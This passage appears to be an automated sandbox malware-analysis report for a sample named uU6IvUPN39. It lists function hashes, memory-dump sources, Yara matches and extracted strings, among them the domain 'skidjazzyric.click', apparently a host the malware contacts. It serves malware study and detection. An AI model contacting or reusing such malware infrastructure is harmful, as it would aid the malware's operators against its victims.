                                                                        • API String ID: 2525500382-0
                                                                        • Opcode ID: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
                                                                        • Instruction ID: 465914559ddae43176014936784d47272b76c5c417137d6c3f74d1ad3517bf54
                                                                        • Opcode Fuzzy Hash: 39e24c8850327072088eaf22e3eb4f87a5337c0b3ab686e23b697ac4ab5ffa30
                                                                        • Instruction Fuzzy Hash: 64912B21208BC28EC326CA3C88586557F921B67228B2D87DCD0FA8F7D7C7669107C766
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :;
                                                                        • API String ID: 0-3581617570
                                                                        • Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                        • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
                                                                        • Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
                                                                        • Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: :;
                                                                        • API String ID: 0-3581617570
                                                                        • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                        • Instruction ID: 40b7f0c4348e8ee57831009a55ec03eab04ed3cd9f0f5e81fd7f5fa39966f6bf
                                                                        • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                        • Instruction Fuzzy Hash: E5A1D572A85360DBD7219F24CC8176BB3E1EF81324F0985A8ECA59B281E379ED45C752
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NP,?
                                                                        • API String ID: 0-3110377521
                                                                        • Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                        • Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
                                                                        • Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
                                                                        • Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NP,?
                                                                        • API String ID: 0-3110377521
                                                                        • Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                        • Instruction ID: 2874c05eb2645546466a1e2e0f9aebc2bc4a1bd1d1149d45520b963e27f06cb5
                                                                        • Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                        • Instruction Fuzzy Hash: E4A148726843209BD724CF29C88DB3FB3A6EBC5728F19862DE8D557290D731A811CBD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ''
                                                                        • API String ID: 0-694448769
                                                                        • Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                        • Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
                                                                        • Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                        • Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ''
                                                                        • API String ID: 0-694448769
                                                                        • Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                        • Instruction ID: 4d9188c3436c8dfb7cffa86ea353e0c4ab3c0fabc7657475856a7ead5cd8f7de
                                                                        • Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                        • Instruction Fuzzy Hash: 8E9122B16593108BC7148F28C89166BB7F2EFC1368F18D92DE8D98B790EB74C505C796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *+
                                                                        • API String ID: 0-2181965719
                                                                        • Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                        • Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
                                                                        • Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                        • Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: _\]R
                                                                        • API String ID: 2994545307-1576797437
                                                                        • Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                        • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                        • Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
                                                                        • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _\]R
                                                                        • API String ID: 0-1576797437
                                                                        • Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                        • Instruction ID: 83f82bd7ee6b240ee059ed0aa95337e3ed0bb450263b6f14b88a0083f3823e38
                                                                        • Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                        • Instruction Fuzzy Hash: 989126316483519BC718DF28C850A6FB7F2EFD9324F19866CE8C587291E731D902C786
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-3019521637
                                                                        • Opcode ID: 33388ca08c4aa4384a6a50b745ca2427dff1f241a701fdc63bacc148eca0ebac
                                                                        • Instruction ID: 7661637dc5d8e8a5c488f056d59cc6aa38c937314abadac712079a8ab4c4f304
                                                                        • Opcode Fuzzy Hash: 33388ca08c4aa4384a6a50b745ca2427dff1f241a701fdc63bacc148eca0ebac
                                                                        • Instruction Fuzzy Hash: 308157717093209BD7149B25AC92B3F73A1EF81314F59862EE985573C1EB3C9C1A839A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3019521637
                                                                        • Opcode ID: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
                                                                        • Instruction ID: ff6dc4baa6dbe457652f94c9832b71f26104b613b3ac812afd172f97869739d0
                                                                        • Opcode Fuzzy Hash: e0b172cd705df7923fbf2ed4e27c4b33ed5b0099bb5f0496611bea36cd42384f
                                                                        • Instruction Fuzzy Hash: 5F8129B1A88320DBE7149B64CC91B2F77A6EFC1314F1A866CECA64B280E735D845C795
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,
                                                                        • API String ID: 0-3772416878
                                                                        • Opcode ID: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                        • Instruction ID: 01c58491163616012ee55187fd92943d7eb5500c339a617f16e03986bf466463
                                                                        • Opcode Fuzzy Hash: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                        • Instruction Fuzzy Hash: 86B138711093819FD321CF18C88065BFBE0AFA9304F444A2DF5DA97782D675EA18CBA6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,
                                                                        • API String ID: 0-3772416878
                                                                        • Opcode ID: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                        • Instruction ID: cd9cdc5bb6e797827ad1c82e0d5adc5d454e0e15e25e7cc7277a9fe9d9ce6b2a
                                                                        • Opcode Fuzzy Hash: cb9d9bb17d339ae8af9f285b74fa207be133779a529036d3e62f497118ea5ea7
                                                                        • Instruction Fuzzy Hash: 8BB147712083819FD325CF68C88065BFBE5AFA9204F444A2DF5D997382D731E918CBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        • Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                        • Instruction ID: ef403fb1259512c9711d70f2e7d5f4cfd006a755ed026aeb3bab0d0ce1423d2c
                                                                        • Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                        • Instruction Fuzzy Hash: 49816827759AD04BD7289E3C4C6127ABE830BD6230F2DD77EB5F68B3E2D56889018345
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        • Opcode ID: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                        • Instruction ID: 112330221fb488cedcd74c1fa6bd29cb76c12920b063b045d148ef0007e23ba6
                                                                        • Opcode Fuzzy Hash: 325107a9566a89f4a2dda67f40c17af6b5e3dbb094075e2adb6cc49459ad4378
                                                                        • Instruction Fuzzy Hash: C9814627799A900BD72C9A3C4C252BE7A930BD2630F2DC7BDB5F68B3E1D6598815C350
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =^"\
                                                                        • API String ID: 0-2152245029
                                                                        • Opcode ID: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
                                                                        • Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
                                                                        • Opcode Fuzzy Hash: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
                                                                        • Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "
                                                                        • API String ID: 0-123907689
                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                        • Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                        • Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "
                                                                        • API String ID: 0-123907689
                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                        • Instruction ID: c0ab41d2968ae1b8f5c0d15846546e9e70001ff886e66f9373ef2e4ec01a9b42
                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                        • Instruction Fuzzy Hash: 1F71E332A48365DBD724CE28E88031EB7E3ABC6714F19C5ADE8B49B391D3759C44C782
                                                                        Strings
                                                                        • 6D135015ECAF0672D0632DF0E28DC412, xrefs: 0213D3D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6D135015ECAF0672D0632DF0E28DC412
                                                                        • API String ID: 0-2874345145
                                                                        • Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                        • Instruction ID: 65dfecaed882c1a551ac4b8204fa7b85aae4fdfb3aee93ab68f708b12f9bbe1d
                                                                        • Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                        • Instruction Fuzzy Hash: 62515B726457008FD32ACF38CCC2A667BA3AFD6310B1D866CC5964B796DB35A406CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _;=8
                                                                        • API String ID: 0-3640539833
                                                                        • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                        • Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
                                                                        • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                        • Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _;=8
                                                                        • API String ID: 0-3640539833
                                                                        • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                        • Instruction ID: 1882263c6e7fe799089d645ebbf40f4f6f48de8321922a19e82ec2a2d27349e6
                                                                        • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                        • Instruction Fuzzy Hash: 0F5100B0551B408BC7389F25C8616B3BBF1FF42349B084E5CC4C78BA45EB39A609CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *+
                                                                        • API String ID: 0-2181965719
                                                                        • Opcode ID: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                        • Instruction ID: 3c67775dfa478e7118533e662a136c51d30de155e79d3e1c10c411d92156f488
                                                                        • Opcode Fuzzy Hash: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                        • Instruction Fuzzy Hash: EC6120B144A3818BD3708F2584917EBFBE2AF96318F54891CD5CC9B254EB394146CB87
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: }I\
                                                                        • API String ID: 0-3759065986
                                                                        • Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                        • Instruction ID: 06326f033c1d303d2a0c44ae50e6a95f42fac71f38a9198839615570ed5a6674
                                                                        • Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                        • Instruction Fuzzy Hash: 653126605546928BEB258F34C8A27B7BBB0FF47310F144759C8C18B785EB78A992CB85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: }I\
                                                                        • API String ID: 0-3759065986
                                                                        • Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                        • Instruction ID: 48e36c9a3f0b01bcca991fd5868706916bdfd81e3c70800ca150a60930a9dfd1
                                                                        • Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                        • Instruction Fuzzy Hash: DC318E705647928BDB11CF34C8917B6BBF0FF8B214B144769D8C18B681EB38A582CB81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: skidjazzyric.click
                                                                        • API String ID: 0-287091379
                                                                        • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                        • Instruction ID: 764d9d3a4717be79920da73eaae230af95e7e9d95c2812270fe992c1b9b69a95
                                                                        • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                        • Instruction Fuzzy Hash: 6FE09A389141058FC708CF58C862677B7B0EF0B301F14A06AD982EB3A0E3389D02C7AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: skidjazzyric.click
                                                                        • API String ID: 0-287091379
                                                                        • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                        • Instruction ID: f0e14d59901f6e9082e2eacce36e1ba03147ba1829e9fca5772566e98ac4743b
                                                                        • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                        • Instruction Fuzzy Hash: 31E09A389101558FC7058F58C8A2676B7B0EF0B304B14A469D982EB320E3389905C7AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee3c8babdd8ca27d4c7d2d50a63fd452c7c20a463d5d8a55cf4e65cb5b776805
                                                                        • Instruction ID: 2a0c7a4dd4ca3d3e8def4cc939e49bf0be2e9f9902089018eca944635f5b4ea3
                                                                        • Opcode Fuzzy Hash: ee3c8babdd8ca27d4c7d2d50a63fd452c7c20a463d5d8a55cf4e65cb5b776805
                                                                        • Instruction Fuzzy Hash: 8572B0B1619F808ED329CF3C8805397BFD6AB5A324F188B5DA0FA877D2CB7561018756
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
                                                                        • Instruction ID: f14b1a32a054cc5d02357b16e4139c05c7a1a12d214dcc5fef3fcda50377de84
                                                                        • Opcode Fuzzy Hash: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
                                                                        • Instruction Fuzzy Hash: 3C52F2715083458FCB14CF24C0806AABFE1BF89314F198A7EF8996B391D779DA49CB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
                                                                        • Instruction ID: 6203b88b25d873d6d2b58834ae3635b94e808e668247f2897ae2ea3b7a46ecc6
                                                                        • Opcode Fuzzy Hash: 2a0560caf1e005bf9593c23293c27da937b43b9d2d83b6212584ccfc0756e270
                                                                        • Instruction Fuzzy Hash: 0452D3715083858FCB1ACF19C0906AABBE2FF84318F1986ADF8E997351D734D849CB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 37211a9a704324c1d47da4259e683596f8723382af120e69f7f272388f5a9581
                                                                        • Instruction ID: b144df342bd44794810ed6ae2ffc05829833fe0313d29caa944da604dfb579d7
                                                                        • Opcode Fuzzy Hash: 37211a9a704324c1d47da4259e683596f8723382af120e69f7f272388f5a9581
                                                                        • Instruction Fuzzy Hash: 1342E8B1A44B408FD715DF38C89136ABBE2AF85310F19862DD8AF87391DB35E446CB42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
